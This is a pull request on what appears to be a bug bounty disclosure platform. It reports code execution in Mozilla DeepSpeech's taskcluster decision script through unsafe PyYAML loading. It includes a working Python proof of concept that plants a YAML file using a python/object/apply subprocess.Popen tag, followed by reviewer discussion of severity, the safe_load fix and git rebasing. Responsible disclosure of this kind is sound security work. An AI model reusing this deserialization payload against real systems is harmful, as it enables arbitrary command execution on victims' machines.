### PR TITLE
Arbitrary  Code execution in Mozilla/DeepSpeech 

### PR DESCRIPTION
**Pull request by B3EF**
## ✍️ Description
**Arbitrary Code Excecution** in mozilla/DeepSpeech. DeepSpeech is an open source embedded (offline, on-device) speech-to-text engine which can run in real time on devices ranging from a Raspberry Pi 4 to high power GPU servers.

# Exploit code
```python
import os

env = ['GITHUB_HEAD_BRANCH', 'GITHUB_HEAD_REPO_URL', 'GITHUB_HEAD_SHA', 'GITHUB_HEAD_USER', 'GITHUB_HEAD_USER_LOGIN', 'TASK_ID']

for x in env:
    if "USER" in x:
        env = "mozilla"
    elif "LOGIN" in x:
        env = "mozilla"
    elif "TASK_ID" in x:
        env = "137"
    else:
        env = ""
    os.environ[x] = env

#os.system("git clone https://github.com/mozilla/DeepSpeech.git")
os.chdir("DeepSpeech/taskcluster")
os.system("mkdir temp/")
os.system("mv *.yml *.cyml *.tyml temp/")

exploit_yaml = """build:
  metadata:
    name: "DeepSpeech Android ARM64 debug"
    description: "Building DeepSpeech for Android ARM64, debug version"

  template_file: extent_exploit.yml
"""

open("exploit.yml", "w+").write(exploit_yaml)

# data = b"""!!python/object/apply:subprocess.Popen
# - ls"""
extent_yaml = """!!python/object/apply:subprocess.Popen
- ['xcalc']
"""
# extent_yaml = """!!python/object/apply:time.sleep [10]"""

open("extent_exploit.yml", "w+").write(extent_yaml)

# os.system("python -m pip install json-e")
# os.system("python -m pip install slugid")
# os.system("python -m pip install networkx")

os.system("python tc-decision.py --dry")
```
# POC
* Run the exploit code 
* downgrade pyyaml to version 3.12

## 💥 Impact
possibilities of code executions
## ✅ Checklist
- [x] _Created and populated the `README.md` and `vulnerability.json` files_
- [x] _Provided the repository URL and any applicable [permalinks]([https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files](https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files))_
- [x] _Defined all the applicable weaknesses ([CWEs]([https://cwe.mitre.org/](https://cwe.mitre.org/)))_
- [x] _Proposed the CVSS vector items i.e. User Interaction, Attack Complexity_
- [x] _Checked that the vulnerability affects the latest version of the package released_
- [x] _Checked that a fix does not currently exist that remediates this vulnerability_
- [x] _Complied with all applicable laws_

### CODE REVIEW

**Comment by JamieSlome** [comment]
@B3EF - can you address the checks?

I believe that your `vulnerability.json` is not a valid JSON.

**Comment by B3EF** [comment]
> @B3EF - can you address the checks?
> 
> I believe that your `vulnerability.json` is not a valid JSON.

let me check xD

**Comment by B3EF** [comment]
> @B3EF - can you address the checks?
> 
> I believe that your `vulnerability.json` is not a valid JSON.

i have slightly made some changes to the json file.

File: bounties/other/DeepSpeech/1/vulnerability.json [hunk 1]
```diff
@@ -0,0 +1,109 @@
...
+    "PR": "",
+    "UI": "",
+    "S": "",
+    "C": "",
+    "I": "",
+    "A": "",
+    "E": "",
+    "RL": "",
+    "RC": "",
+    "Score": "9.x"
```
Comment (Mik317) [inline bounties/other/DeepSpeech/1/vulnerability.json:34]: Too high in my opinion for an attack which requires anyway `write permissions` and `run` for a file in a specific directory:
Screenshot from 2020-12-05 13-25-09

**Review by Mik317 — APPROVED** [review]
LGTM :smile: :cake:
I'm not sure if the fact you need to have control on the `dir` and the `tc-decision.py` file for running it can be so limiting to avoid impact, but I think it could be easily fixed, also because it seems the function is used only to load `yml` files which therefore could be manipulated and lead to `RCE` in other cases.

Cheers,
Mik

**Review by mufeedvh — APPROVED** [review]
![LGTM](https://img.shields.io/badge/LGTM-red?labelColor=black&link=https://www.huntr.dev&style=flat-square&logo=data:image/png;base64,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)

**Comment by adam-nygate** [comment]
@B3EF from your README.md, it seems like the vulnerability is in an older version of `pyyaml`, not directly in the code of `mozilla/DeepSpeech`. Can you clarify this?

**Comment by adam-nygate** [comment]
@B3EF this seems like an issue in a known vulnerable dependency of the project, rather than a vulnerability in the project itself. Closing for now, but please let me know if you feel differently.

**Comment by B3EF** [comment]
> @B3EF from your README.md, it seems like the vulnerability is in an older version of `pyyaml`, not directly in the code of `mozilla/DeepSpeech`. Can you clarify this?
the DeepSpeech is working with the older version of pyyaml , even though the new versions of pyyaml can also be exploited .

**Comment by adam-nygate** [comment]
>> @B3EF from your README.md, it seems like the vulnerability is in an older version of `pyyaml`, not directly in the code of `mozilla/DeepSpeech`. Can you clarify this?
> the DeepSpeech is working with the older version of pyyaml , even though the new versions of pyyaml can also be exploited.

Ah, so the "downgrade pyyaml to version 3.12" in your PoC is not necessary?

**Comment by B3EF** [comment]
> > > @B3EF from your README.md, it seems like the vulnerability is in an older version of `pyyaml`, not directly in the code of `mozilla/DeepSpeech`. Can you clarify this?
> > > the DeepSpeech is working with the older version of pyyaml , even though the new versions of pyyaml can also be exploited.
> 
> Ah, so the "downgrade pyyaml to version 3.12" in your PoC is not necessary?

its is necessary since the project is built on the older version

**Comment by adam-nygate** [comment]
> > > > @B3EF from your README.md, it seems like the vulnerability is in an older version of `pyyaml`, not directly in the code of `mozilla/DeepSpeech`. Can you clarify this?
> > > > the DeepSpeech is working with the older version of pyyaml , even though the new versions of pyyaml can also be exploited.
> > 
> > 
> > Ah, so the "downgrade pyyaml to version 3.12" in your PoC is not necessary?
> 
> its is necessary since the project is built on the older version

Ah, sorry. I misunderstood what you meant by downgrade. I see now that you mean downgrade your local pyyaml installation so that the project uses the _current_ (3.12) version, as defined by the project.

Does this vulnerability exist in the latest version of pyyaml?

**Comment by B3EF** [comment]
> > > > > @B3EF from your README.md, it seems like the vulnerability is in an older version of `pyyaml`, not directly in the code of `mozilla/DeepSpeech`. Can you clarify this?
> > > > > the DeepSpeech is working with the older version of pyyaml , even though the new versions of pyyaml can also be exploited.
> > > 
> > > 
> > > Ah, so the "downgrade pyyaml to version 3.12" in your PoC is not necessary?
> > 
> > 
> > its is necessary since the project is built on the older version
> 
> Ah, sorry. I misunderstood what you meant by downgrade. I see now that you mean downgrade your local pyyaml installation so that the project uses the _current_ (3.12) version, as defined by the project.
> 
> Does this vulnerability exist in the latest version of pyyaml?

yes

**Comment by B3EF** [comment]
@adam-nygate  any updates on these ...
because i have wasted several days on many repos searching for these bug ...

**Comment by adam-nygate** [comment]
Hey @B3EF, thanks for your explanation! I understand, so in other words, pyyaml is vulnerable and have developed an alternate function (`safe_load`) which fixes this issue, however, the stated project(s) don't currently use this function, and so are vulnerable. Can you just confirm this and then I'll merge all of the PRs.

Sorry for the delay!

**Comment by B3EF** [comment]
@adam-nygate  yhea that's what i was trying to point out .

**Comment by adam-nygate** [comment]
@B3EF can you please rebase your PRs to the latest commit on staging. This should fix the disclosure checks, allowing us to merge them in

**Comment by B3EF** [comment]
@adam-nygate i am not familiar with this rebase thing , tried to catch up with it but not working ,did i need to change all my pr's in to a single branch ?

**Comment by mzfr** [comment]
@B3EF You must have the `staging` branch in your own cloned repo. Checkout that staging branch, pull all the new changes, and then checkout to this(mozilla-deepsearch) branch and run the `git rebase staging` command.

Please see this(https://stackoverflow.com/questions/17182624/contributing-to-project-on-github-how-to-rebase-my-pull-request-on-top-of-mast). Remember that in your case the default is staging and not master.

Hope this helps!

**Comment by B3EF** [comment]
> @B3EF You must have the `staging` branch in your own cloned repo. Checkout that staging branch, pull all the new changes, and then checkout to this(mozilla-deepsearch) branch and run the `git rebase staging` command.
> 
> Please see this(https://stackoverflow.com/questions/17182624/contributing-to-project-on-github-how-to-rebase-my-pull-request-on-top-of-mast). Remember that in your case the default is staging and not master.
> 
> Hope this helps!

hi @mzfr tried rebasing it several time but its failing with some error ?

**Comment by mzfr** [comment]
@B3EF Please list all the steps that you did and also paste the error that you are having.

**Comment by B3EF** [comment]
> @B3EF Please list all the steps that you did and also paste the error that you are having.

git checkout staging
git pull upstream staging
git checkout mozilla-deepsearch
git rebase staging

also tried to add the file with 
git add <path>
and
git rebase --continue

**Comment by mzfr** [comment]
@B3EF once the conflict happens you need to remove the lines that cause the conflict.

Please read [this](https://akrabat.com/the-beginners-guide-to-rebasing-your-pr/)

Also if you get confused about which changes to keep then check the `staging` branch of this repository.

**Comment by JamieSlome** [comment]
@B3EF - Instead of being `other`, should this disclosure not be in `pip`?

https://pypi.org/project/deepspeech/

**Comment by B3EF** [comment]
> @B3EF - Instead of being `other`, should this disclosure not be in `pip`?
> 
> https://pypi.org/project/deepspeech/

if we are installing deepspeech through pip then we will not be able to exploit the exploitable file since its not dependent on the other files , so that i have mentioned it in this registry,
did i need to change it.

**Pull request merged**